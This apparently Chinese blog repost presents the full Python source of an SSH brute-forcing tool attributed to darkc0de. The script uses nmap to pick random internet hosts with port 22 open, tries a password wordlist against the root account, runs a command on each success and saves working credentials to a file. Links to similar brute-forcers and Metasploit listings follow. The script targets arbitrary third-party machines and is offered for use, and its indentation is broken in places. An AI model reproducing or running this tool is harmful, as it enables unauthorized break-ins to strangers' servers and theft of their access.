SSH BruteForcer Source code

最新推荐文章于 2018-01-15 10:32:00 发布
转载 最新推荐文章于 2018-01-15 10:32:00 发布 · 1k 阅读 · 0
文章标签:

#ssh #login #user #command #exception #file

本文介绍了一个使用Python编写的SSH暴力破解工具,该工具利用nmap扫描开放的SSH端口,并尝试使用字典进行暴力破解登录。
#!/usr/bin/python
#SSH BruteForcer that scans for random
#open ssh ports using nmap and then brute 
#forces them.


#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com


import sys, time, StringIO, commands, re


#Set the successful login file.
save_file = "SSH_Logins.txt"
#Set verbose mode: 1=on 0=off
verbose = 1
#Set the user to use.
user = "root"


try:
import pexpect, pxssh
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)

def scan():
args = 'nmap -iR 1 -p 22 -open | grep open -B 3'
nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).read()
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
if ipaddr:
    return ipaddr[0]


def brute(ip, word):
if verbose != 0:
print "Trying:",word
     try:
         s = pxssh.pxssh()
         s.login (ip, user, word, login_timeout=10)
         s.sendline (command)
         s.prompt()
         print "\n",s.before
         s.logout()
print "\t[!] Login Success:",user, word,"\n"
logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"\n")
   except Exception, e:
         #print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Quit\n"
logins.close()
sys.exit(1)


print "\n\t   d3hydr8:darkc0de.com sshBrute/Random v1.0"
print "\t----------------------------------------------"

if len(sys.argv) != 3:
print "\nUsage : ./sshbrute_random.py <how many> <wordlist>"
print "Eg: ./sshbrute_random.py 1000 words.txt\n"
sys.exit(1)


num = sys.argv[1]
command = 'uname -a'
logins = open(save_file, "a")


try:
words = open(sys.argv[2], "r").readlines()
except(IOError): 
   print "\n[-] Error: Check your wordlist path\n"
   sys.exit(1)


print "\n[+] Loaded:",len(words),"words"
print "[+] User:",user
print "[+] Save file:",save_file
if verbose != 0:
print "[+] Verbose Mode: On"
else:
print "[+] Verbose Mode: Off"
print "[+] Scanning:",num,"ips\n"


for x in xrange(int(num)):
print "[-] Scanning:",x+1,"of",num
ip = scan()
if ip != None:
print "\n\t[+] BruteForcing:",ip,"\n"
for word in words:
#Change this time if needed
time.sleep(0.5)
brute(ip, word.replace("\n",""))
logins.close()
print "\n[-] Done\n"
BruteForceSSH:简单的SSH bruteforcer,具有基本的彩色界面。 SSH连接是通过paramiko模块建立的。这个小脚本完全由我编码,因此不一定经过优化,这是一个简单的项目
03-19
蛮力SSH 简单的SSH bruteforcer,具有基本的彩色界面。 SSH连接是通过paramiko模块建立的。这个小脚本完全由我编写,因此不一定经过优化,这是一个简单的项目。 要求 您需要安装paramiko模块,要安装它,请输入: pip install paramiko 您还需要安装socks模块,要安装它,请输入: pip install socks 怎么用 您需要在wordlist.txt文件中添加密码单词表。 使用python BruteForceSSH.py启动应用程序,然后输入目标的请求信息。 我明确指出,我对您的行为概不负责,我提供的工具仅用于教育目的。
ssh-bruteforcer:一个用于在网站上强行强制ssh端口的简单Ruby工具
04-11
ssh-bruteforcer 一个用于在网站上强行强制ssh端口的简单Ruby工具
SSHatter SSH Brute Forcer
cnbird's blog
05-22 1029
SSHatter is an SSH brute force utility available from http://freshmeat.net/projects/sshatter/?branch_id=70781&release_id=263196. Essentially the tool is comprised of a small Perl file. The utility req
防范ssh暴力破解攻击(ssh brute force attack)
JasonMei的专栏
05-31 2875
文章来源:http://www.codelast.com/ 暴露在网络上的主机都是有风险的,其中一种风险就是ssh暴力破解攻击(ssh brute force attack)。 请先看看你的Linux主机的 /var/log/secure 文件的内容,如果你发现里面记录有无数条用各种甚至在你的系统中都不存在的用户名来尝试登录你的系统的日志,那么你就要当心了,这很有可能是别人在用工具不断
Install brutessh on CentOS 5.8
天元喜羊羊的博客
08-04 1274
http://kezhong.wordpress.com/2012/10/30/install-brutessh-on-centos-5-8/ For security reason, our NOC team should limit ssh access outside from our customers so as to prevent SSH brute force att
msf-show
weixin_30548917的博客
01-15 3643
Metasploit框架中包涵数百个模块,没有人能用脑子把它们的名字全部记下来。在MSF终端中运行show命令会把所有的模块显示出来,也可以指定模块的类型来缩小搜索范围。 1. msf > show exploits Exploits ======== Name ...
metasploit使用辅助模块
热门推荐
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
Perl Underground 5
08-26 1万+
  $$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ %%%%%%%% X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ %%%%%%%% x H H $$
Kali linux 2016.2(Rolling)中的auxiliary模块详解
weixin_33858336的博客
11-15 1925
root@kali:~# msfconsole ______________________________________________________________________________ | ...
sshackle:带有Tor的SSH bruteforcer
04-29
在Go中实现了Ssh bruteforcer,并通过Tor进行了调整请求。 它尝试使用所有密码来连接到具有密码列表的IP地址列表。 这些请求是同时进行的:3 。 它仅适用于密码验证。 要运行,您需要在本地网络上运行安装的 。 ...
BruteForcer-开源
05-13
客户端服务器多线程应用程序,用于蛮力破解密码。 连接的客户端越多,破解速度就越快。 基于插件。 目前仅支持RAR密码,并且仅支持加密的文件名。
EGBTestArea:Extreme GPU Bruteforcer 测试规则-开源
07-05
EGBTestArea (ETA) 是一个脚本,您可以使用它来测试 Extreme GPU Bruteforcer 的配置或单独的哈希蛮力规则。 在效率和工作速度方面比较它们。
多功能仿真软件Multisim中MC1496信号乘法混合电路仿真资源
最新发布
11-27
本资源包含了一个使用Multisim仿真软件实现的MC1496信号乘法混合电路的工程文件。此电路是根据网络上的电路图自主绘制的,旨在帮助电子爱好者、工程师及学生更好地理解和学习信号乘法混合电路的原理及其在实际应用中的表现。 文件描述 文件名:multisim仿真MC1496实现的信号乘法混合.rar 内容:Multisim仿真工程文件,包含电路图和相关仿真设置。 注意事项 本资源为仿真文件,运行前请确保已安装Multisim仿真软件。 电路图仅供参考,如有任何疑问或需要帮助,请根据个人学习途径寻求解答。 本资源中所包含的电路图是根据网上资料自主绘制,如有不准确之处,请以实际应用为准。 使用说明 解压下载的文件至指定文件夹。 打开Multisim软件,选择“打开工程”功能,找到并打开解压后的工程文件。 根据个人需求进行仿真实验或修改电路参数。
基于PyQt5的Python图书管理系统开发实践
11-27
采用PyQt5框架与Python编程语言构建图书信息管理平台 本项目基于Python编程环境,结合PyQt5图形界面开发库,设计实现了一套完整的图书信息管理解决方案。该系统主要面向图书馆、书店等机构的日常运营需求,通过模块化设计实现了图书信息的标准化管理流程。 系统架构采用典型的三层设计模式,包含数据存储层、业务逻辑层和用户界面层。数据持久化方案支持SQLite轻量级数据库与MySQL企业级数据库的双重配置选项,通过统一的数据库操作接口实现数据存取隔离。在数据建模方面,设计了包含图书基本信息、读者档案、借阅记录等核心数据实体,各实体间通过主外键约束建立关联关系。 核心功能模块包含六大子系统: 1. 图书编目管理:支持国际标准书号、中国图书馆分类法等专业元数据的规范化著录,提供批量导入与单条录入两种数据采集方式 2. 库存动态监控:实时追踪在架数量、借出状态、预约队列等流通指标,设置库存预警阈值自动提醒补货 3. 读者服务管理:建立完整的读者信用评价体系,记录借阅历史与违规行为,实施差异化借阅权限管理 4. 流通业务处理:涵盖借书登记、归还处理、续借申请、逾期计算等标准业务流程,支持射频识别技术设备集成 5. 统计报表生成:按日/月/年周期自动生成流通统计、热门图书排行、读者活跃度等多维度分析图表 6. 系统维护配置:提供用户权限分级管理、数据备份恢复、操作日志审计等管理功能 在技术实现层面,界面设计遵循Material Design设计规范,采用QSS样式表实现视觉定制化。通过信号槽机制实现前后端数据双向绑定,运用多线程处理技术保障界面响应流畅度。数据验证机制包含前端格式校验与后端业务规则双重保障,关键操作均设有二次确认流程。 该系统适用于中小型图书管理场景,通过可扩展的插件架构支持功能模块的灵活组合。开发过程中特别注重代码的可维护性,采用面向对象编程范式实现高内聚低耦合的组件设计,为后续功能迭代奠定技术基础。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
理工科研究生学习课程-最优化理论与方法
11-27
文档主要为最优化理论与方法学习过程中的笔记记录,包含各类题型,牛顿法,最速下降法,单纯形法,动态规划法,大M法等
【硕士论文完美复现】【价格型需求响应】基于需求侧响应的配电网供电能力综合评估(Python代码实现)
11-27
【硕士论文完美复现】【价格型需求响应】基于需求侧响应的配电网供电能力综合评估(Python代码实现)内容概要:本文档是一份关于“基于需求侧响应的配电网供电能力综合评估”的硕士论文复现资源,重点围绕价格型需求响应展开,结合Python代码实现,对配电网在考虑用户侧响应情况下的供电能力进行建模与评估。内容涵盖电力系统中需求响应机制的设计、负荷调整模型的构建、优化算法的应用以及供电能力的量化分析,旨在通过仿真手段提升配电网运行效率与可靠性,并验证所提方法的有效性。文档还附带完整的代码资源链接,便于读者复现实验结果。; 适合人群:具备一定电力系统基础知识和Python编程能力的研究生、科研人员及从事智能电网相关工作的技术人员。; 使用场景及目标:①用于学习和复现硕士论文中的需求响应模型与供电能力评估方法;②支撑科研项目中对配电网灵活性与用户侧互动机制的研究;③为微电网、虚拟电厂等领域的优化调度提供技术参考。; 阅读建议:建议结合文中提供的网盘资源下载完整代码与数据,边运行代码边理解模型细节,重点关注需求响应建模与供电能力计算的实现逻辑,同时可扩展应用于其他优化场景。
解锁编程技能:从零基础开启你的Python编程之旅
11-27
解锁编程技能:从零基础开启你的Python编程之旅
关于串口与UDP通讯的实验
11-27
通讯测试
BruteForcer开源工具:多线程破解RAR密码
其次,BruteForcer-开源项目是一个客户端-服务器架构的程序。在这种架构中,服务器负责接收来自客户端的请求,并将破解任务分发给连接的客户端。客户端执行实际的密码猜测工作,并将结果返回给服务器。这种模式允许...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值